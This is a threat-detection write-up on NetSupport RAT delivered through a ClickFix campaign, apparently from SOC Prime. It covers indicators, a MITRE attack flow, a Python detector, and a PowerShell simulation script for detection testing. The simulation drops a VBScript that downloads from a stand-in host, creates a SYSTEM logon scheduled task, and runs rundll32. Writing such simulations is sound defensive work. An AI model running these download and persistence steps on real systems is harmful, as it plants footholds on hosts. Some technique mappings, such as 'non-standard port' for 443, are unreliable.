SOC Prime Bias: Medium

03 Jun 2026 16:13 UTC

NetSupport RAT Delivered by an Unidentified Loader

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A previously unidentified remote access tool was observed delivering a malicious NetSupport Manager RAT package. The initial malware communicated with a command-and-control server at 89.110.110.119 over TCP port 443 using encoded traffic. The campaign, tracked as SmartApeSG ClickFix, relied on malicious scripts and a CAB archive to install the NetSupport RAT on victim systems.

Investigation

The investigation uncovered multiple indicators, including malicious URLs, IP addresses, and files written to the ProgramData directory. The initial RAT delivered a batch script that extracted and installed the NetSupport RAT from a setup.cab archive. Once installation was complete, the supporting files were removed to reduce visible traces of the activity.

Mitigation

Organizations should block network traffic to the identified malicious IP addresses and domains and monitor for creation of the referenced files under ProgramData. Endpoint defenses should detect execution of suspicious VBScript and batch files, while network monitoring should apply stricter controls to encoded traffic over port 443.
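As an added example (not part of the SOC Prime write-up), the following Python turns the guidance above into detection logic run over constructed Sysmon-style JSON events: it flags the three staging files written under ProgramData, script-host or rundll32 execution of those files, and connections to the C2 endpoint named in the summary. The event field names, the sample lines and the client binary name under UpdateInstaller are assumptions made for this example.

```python
import json
import re

# Indicators taken from the write-up: the C2 endpoint and the three staging files under ProgramData.
C2_IP, C2_PORT = "89.110.110.119", 443
STAGING_FILE = re.compile(r"^c:\\programdata\\(processor\.vbs|token\.bat|setup\.cab)$", re.I)
# Script hosts and loaders seen in the chain; a ProgramData .vbs/.bat/.cab on their command line is the signal.
HOSTS = {"cscript.exe", "wscript.exe", "cmd.exe", "rundll32.exe"}
HOST_ARG = re.compile(r"c:\\programdata\\[^\s\"]*\.(vbs|bat|cab)\b", re.I)

def classify(event):
    """Return a finding for one Sysmon-style event dict, or None when nothing matches."""
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        cmd = event.get("CommandLine", "")
        if image in HOSTS and HOST_ARG.search(cmd):
            return f"process: {image} executing staging file: {cmd}"
    elif kind == "FileCreate":
        if STAGING_FILE.match(event.get("TargetFilename", "")):
            return f"file: staging artifact written: {event['TargetFilename']}"
    elif kind == "NetworkConnect":
        if event.get("DestinationIp") == C2_IP and event.get("DestinationPort") == C2_PORT:
            return f"network: C2 connection to {C2_IP}:{C2_PORT} from {event.get('Image')}"
    return None

def scan(json_lines):
    """Run classify over newline-delimited JSON events and return the findings in log order."""
    return [f for f in (classify(json.loads(line)) for line in json_lines) if f]

# Constructed sample telemetry (assumed field names; not from a real incident). Lines 1-5 mirror
# the infection chain, lines 6-8 are benign activity that must not fire.
SAMPLE_LOG = [
    r'{"EventType":"FileCreate","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\ProgramData\\processor.vbs"}',
    r'{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\cscript.exe","CommandLine":"cscript.exe //B //Nologo \"C:\\ProgramData\\processor.vbs\""}',
    r'{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c C:\\ProgramData\\token.bat"}',
    r'{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\rundll32.exe","CommandLine":"rundll32.exe C:\\ProgramData\\setup.cab,DummyEntryPoint"}',
    r'{"EventType":"NetworkConnect","Image":"C:\\ProgramData\\UpdateInstaller\\client.exe","DestinationIp":"89.110.110.119","DestinationPort":443}',
    r'{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c C:\\Users\\alice\\build.bat"}',
    r'{"EventType":"FileCreate","Image":"C:\\Windows\\explorer.exe","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\cache.dat"}',
    r'{"EventType":"NetworkConnect","Image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","DestinationIp":"203.0.113.10","DestinationPort":443}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Feeding real Sysmon exports into `scan` only requires mapping the event IDs (1, 11, 3) onto the `EventType` values used here.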

Response

Defenders should alert on the listed indicators, isolate affected systems, and conduct forensic analysis to uncover any persistence mechanisms. Malicious files should be removed, any unauthorized changes should be reversed, and firewall policies should be updated to block outbound communication with the identified command-and-control infrastructure.

Attack Flow

The steps of the attack-flow diagram, each leading to the next:

  1. T1204.001 User Execution: Malicious Link. Victim loads malicious JavaScript from a compromised page.
  2. T1027.006 Obfuscated Files: HTML Smuggling. Delivery of encoded script using the HTML smuggling technique.
  3. T1059.005 Command and Scripting Interpreter: Visual Basic. processor.vbs drops token.bat to the system.
  4. Execution of batch script. Outcome: extracts NetSupport RAT onto the host.
  5. T1547.014 Active Setup and T1546.007 Netsh Helper DLL. RAT placed in C:\ProgramData\UpdateInstaller to achieve persistence.
  6. T1574.007 Path Interception and T1574.005 Installer Permissions Weakness. Privilege escalation via malicious PATH entry and weak installer permissions.
  7. T1564 Hide Artifacts and T1564.010 Process Argument Spoofing. Staging files are deleted and process arguments are spoofed to evade defenses.
  8. T1571 Non-Standard Port and T1071.001 Web Protocols. Command-and-control traffic over TCP 443 using encoded web protocol communications.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker who has gained an initial foothold on a Windows host drops three malicious artifacts into C:\ProgramData:

    1. processor.vbs – a Visual Basic script that downloads the main RAT binary.
    2. token.bat – a batch file that creates a scheduled task for persistence.
    3. setup.cab – a CAB archive that contains a DLL dropped into C:\ProgramData and later loaded via rundll32.exe.

    The attacker then executes each file in turn, causing process-creation events that contain the exact file paths required by the Sigma rule.

  • Regression Test Script:

    # netSupport_RAT_simulation.ps1
    # -------------------------------------------------
    # PURPOSE: Reproduce NetSupport RAT infection telemetry
    # -------------------------------------------------

    $targetDir = "C:\ProgramData"
    # Ensure the directory exists
    if (-Not (Test-Path $targetDir)) { New-Item -ItemType Directory -Path $targetDir -Force | Out-Null }

    # 1. Drop processor.vbs (downloader stub; the URL is a non-routable placeholder)
    $vbsPath = Join-Path $targetDir "processor.vbs"
    Set-Content -Path $vbsPath -Value @"
    Set objXML = CreateObject("MSXML2.XMLHTTP")
    objXML.open "GET","http://malicious.example.com/payload.exe",False
    objXML.send
    "@

    # 2. Drop token.bat ($targetDir is expanded inside the here-string)
    $batPath = Join-Path $targetDir "token.bat"
    Set-Content -Path $batPath -Value @"
    schtasks /create /tn "NetSupportPersist" /tr "$targetDir\setup.cab" /sc onlogon /ru System
    "@

    # 3. Drop setup.cab (dummy CAB containing a text file)
    $cabPath = Join-Path $targetDir "setup.cab"
    $tempDir = "$env:TEMP\cab_temp"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    Set-Content -Path "$tempDir\dummy.txt" -Value "placeholder"
    # Create a CAB - requires makecab (built-in Windows tool)
    & makecab.exe "$tempDir\dummy.txt" $cabPath

    # Execution phase - trigger the detections
    Write-Host "`n[+] Executing processor.vbs"
    cscript.exe //B //Nologo $vbsPath

    Write-Host "[+] Executing token.bat"
    cmd.exe /c $batPath

    Write-Host "[+] Executing setup.cab via rundll32 (simulated load)"
    # Pass "path,EntryPoint" as ONE argument; an unquoted comma makes PowerShell split it into two
    rundll32.exe "$cabPath,DummyEntryPoint"

    # Cleanup temporary folder used for CAB creation
    Remove-Item -Recurse -Force $tempDir

  • Cleanup Commands:

    # netSupport_RAT_cleanup.ps1
    # Remove the three staging artifacts dropped by the simulation
    $targetDir = "C:\ProgramData"
    $files = @("processor.vbs","token.bat","setup.cab")
    foreach ($f in $files) {
        $fullPath = Join-Path $targetDir $f
        if (Test-Path $fullPath) { Remove-Item -Force $fullPath }
    }
    # Remove the scheduled task created by token.bat
    schtasks /delete /tn "NetSupportPersist" /f
    Write-Host "Cleanup complete."